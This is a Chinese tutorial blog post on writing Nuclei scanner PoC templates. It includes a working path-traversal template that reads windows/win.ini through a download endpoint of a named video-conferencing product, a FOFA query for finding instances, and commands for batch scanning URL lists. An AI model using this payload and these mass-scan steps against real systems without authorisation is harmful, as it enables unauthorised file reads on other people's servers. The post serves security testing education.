nuclei poc简单编写

admin

138985
文章

114
评论

2023年11月22日16:02:58评论108 views字数 1769阅读5分53秒阅读模式

nuclei poc简单编写

nuclei是什么

Nuclei 是一款快速可利用的漏洞扫描程序，旨在探测现代应用程序、基础设施、云平台和网络，帮助识别和缓解漏洞。

Nuclei 的核心是利用模板（以简单的 YAML 文件表示）来描述检测、排名和解决特定安全缺陷的方法。

每个模板都描绘了可能的攻击路线，详细说明了漏洞、其严重性、优先级以及偶尔相关的漏洞利用。这种以模板为中心的方法确保 Nuclei 不仅可以识别潜在威胁，还可以查明具有实际影响的可利用漏洞。

#官网：https://nuclei.projectdiscovery.io/#项目地址：https://github.com/projectdiscovery/nucleihttps://github.com/projectdiscovery/nuclei-burp-plugin#Nuclei-Templates项目地址：https://github.com/projectdiscovery/nuclei-templates#其他参考:https://r0fus0d.blog.ffffffff0x.com/post/nuclei/

✨ 安装nuclei

#中文介绍https://github.com/projectdiscovery/nuclei/blob/main/README_CN.md#mac平台安装brew install nuclei#windows安装https://github.com/projectdiscovery/nuclei/releases#配置环境变量即可

✨ 安装nuclei的bp插件

#下载插件jar:https://github.com/projectdiscovery/nuclei-burp-plugin

打开burp

加载插件

在生成的yaml文件基础上做修改

id: hst_readfileinfo:  name: hst_readfile  author: pro  severity: info  description: https://hst.com/  tags: hst,readhttp:  - raw:      - |        GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/jxl,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Connection: close        sec-ch-ua-platform: "Windows"        sec-ch-ua: "Google Chrome";v="113", "Chromium";v="113", "Not=A?Brand";v="24"        sec-ch-ua-mobile: ?0    matchers:      - type: word        words:          - "[fonts]"          - "[extensions]"        condition: and      - type: status        status:          - 200

✨ 使用nuclei批量漏洞检测

#fofa语法app="好视通-视频会议"nuclei使用#单个目标检测nuclei -t 111.yaml -u https://xxxx/#批量检测nuclei -l url2.txt  -t 111.yaml

nuclei poc简单编写

原文始发于微信公众号（echoabced）：nuclei poc简单编写

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

nuclei poc简单编写

HTB-CozyHosting 红队靶机三阶渗透思维突破：Cookie伪造+命令注入组合拳

【vulhub】 GoldenEye

MCP带来的新型安全威胁

一次有趣的前端加密对抗分享

记一次对湾湾站点的getshell到网

一个被遗忘的 API 端点让我赚了 $500

使用burpsuite爆破带有验证码和随机uuid的密码的一次经验

RAG 受到攻击：LLM 漏洞如何影响真实系统

某次211大学的渗透测试过程

源码泄露发现

发表评论

在线咨询

微信